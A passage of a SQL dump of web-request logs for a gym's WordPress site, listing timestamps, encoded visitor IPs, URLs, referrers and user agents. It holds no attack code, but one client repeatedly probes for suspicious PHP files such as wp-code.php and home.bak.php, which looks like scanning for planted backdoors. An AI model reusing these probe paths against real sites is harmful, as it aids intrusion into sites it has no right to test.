(68785, 1491299954.548986, 3567663235, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(68786, 1491301768.743074, 3657081272, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(68787, 1491304279.813738, 782305553, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/inedx.php', 'http://www.crosstrainingcenter.be/inedx.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(68788, 1491308702.918178, 3475901897, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68789, 1491308790.299276, 2297635928, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(68790, 1491308790.828893, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(68791, 1491308794.971525, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(68792, 1491308801.767129, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(68793, 1491308813.043312, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(68794, 1491308816.971082, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(68795, 1491308822.296055, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(68796, 1491308826.988794, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(68797, 1491308885.275837, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(68798, 1491308897.532590, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(68799, 1491308912.552597, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(68800, 1491308927.055904, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(68801, 1491308939.800267, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(68802, 1491308950.826354, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(68803, 1491308955.316277, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(68804, 1491309496.934880, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/indes.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68805, 1491312505.017053, 1055593445, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG GT-I9515 Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36'),
(68806, 1491312507.606865, 1055593445, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG GT-I9515 Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36'),
(68807, 1491321031.180383, 3657081272, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(68808, 1491321768.064511, 1464064168, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(68809, 1491321769.859742, 1464064168, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(68810, 1491323080.460672, 1078646641, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', '\\\'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)\\\''),
(68811, 1491327006.602413, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(68812, 1491327009.590987, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(68813, 1491327517.466227, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/extracts.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68814, 1491330358.633737, 3657081272, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(68815, 1491334045.070643, 1538306626, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(68816, 1491334045.806487, 1538306626, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68817, 1491334046.321285, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68818, 1491334046.820470, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68819, 1491334047.270535, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68820, 1491334047.856627, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68821, 1491334048.426471, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68822, 1491334049.467822, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68823, 1491334050.214108, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68824, 1491334050.693071, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68825, 1491334051.164295, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68826, 1491339397.728515, 3024883604, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(68827, 1491340109.276767, 3475901904, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68828, 1491341856.101780, 3475901904, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68829, 1491343289.949691, 2637637529, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68830, 1491343445.116122, 3475901904, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68831, 1491344165.298454, 3657081272, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(68832, 1491345380.828000, 3475901904, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68833, 1491345960.129587, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-conet.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68834, 1491346685.876547, 3657081272, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(68835, 1491346965.646874, 3475901904, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68836, 1491349955.554983, 3657081272, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(68837, 1491350201.407757, 3475901904, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68838, 1491355477.591591, 3657081272, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(68839, 1491359353.189867, 3475901893, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68840, 1491361379.572236, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68841, 1491361380.018601, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68842, 1491362992.454192, 3657081272, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/sitemap.xml', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(68843, 1491363523.825052, 3657081272, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(68844, 1491364318.071412, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-cods.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68845, 1491371090.280118, 1123631313, 0, 0, 1, 0, 1, 'https://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68846, 1491371090.747832, 1123631313, 0, 1, 1, 0, 1, 'https://www.crosstrainingcenter.be/.well-known/apple-app-site-association', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68847, 1491371099.894083, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(68848, 1491374875.149635, 3567663235, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(68849, 1491374879.121926, 3567663235, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(68850, 1491374879.506024, 3567663235, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(68851, 1491380238.030869, 1538774580, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(68852, 1491380239.851996, 1538774580, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(68853, 1491380378.208445, 1538306626, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(68854, 1491380378.763546, 1538306626, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68855, 1491380379.205783, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68856, 1491380379.661125, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68857, 1491380380.159362, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68858, 1491380380.618646, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68859, 1491380381.214153, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68860, 1491380381.679025, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68861, 1491380382.147822, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68862, 1491380382.667171, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68863, 1491380383.163523, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68864, 1491381786.538010, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-code.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68865, 1491382951.768017, 1538306626, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(68866, 1491382952.316346, 1538306626, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68867, 1491382952.781675, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68868, 1491382953.243185, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68869, 1491382953.732158, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68870, 1491382954.180449, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68871, 1491382954.763004, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68872, 1491382955.278613, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68873, 1491382955.767490, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68874, 1491382956.200091, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68875, 1491382956.644136, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68876, 1491383205.995410, 1123631176, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68877, 1491383207.251408, 1123631302, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68878, 1491386653.189015, 676177670, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68879, 1491386653.945850, 676177670, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68880, 1491391455.063287, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68881, 1491391776.247696, 1837273247, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_2 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A456 Safari/602.1'),
(68882, 1491391795.274859, 1837273247, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_2 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A456 Safari/602.1'),
(68883, 1491391894.238114, 1837273247, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_2 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A456 Safari/602.1'),
(68884, 1491391930.118655, 1837273247, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_2 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A456 Safari/602.1'),
(68885, 1491395293.461531, 1538764546, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(68886, 1491395295.485236, 1538764546, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(68887, 1491395323.324599, 1538764546, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(68888, 1491395333.610561, 1538764546, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(68889, 1491395338.716373, 1538764546, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(68890, 1491397802.374069, 676177790, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68891, 1491397803.027088, 676177790, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)'),
(68892, 1491397805.603155, 3475901918, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68893, 1491400004.297153, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/home.bak.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68894, 1491401387.113522, 1837273758, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G930F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(68895, 1491401389.101510, 1837273758, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G930F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(68896, 1491401483.720728, 3475901918, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68897, 1491403269.657226, 3567663235, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjBtbqPxo3TAhWC6xQKHahcBUcQFggdMAA&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(68898, 1491403275.195147, 3567663235, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(68899, 1491403275.705804, 3567663235, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(68900, 1491407286.313452, 1381038547, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/536.30.1 (KHTML, like Gecko) Version/6.0.5 Safari/536.30.1'),
(68901, 1491407287.561354, 1381038492, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0'),
(68902, 1491407290.391528, 1381038492, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36'),
(68903, 1491407290.454053, 1381038492, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0'),
(68904, 1491407291.223358, 1381038492, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0'),
(68905, 1491407291.649074, 1381038492, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36'),
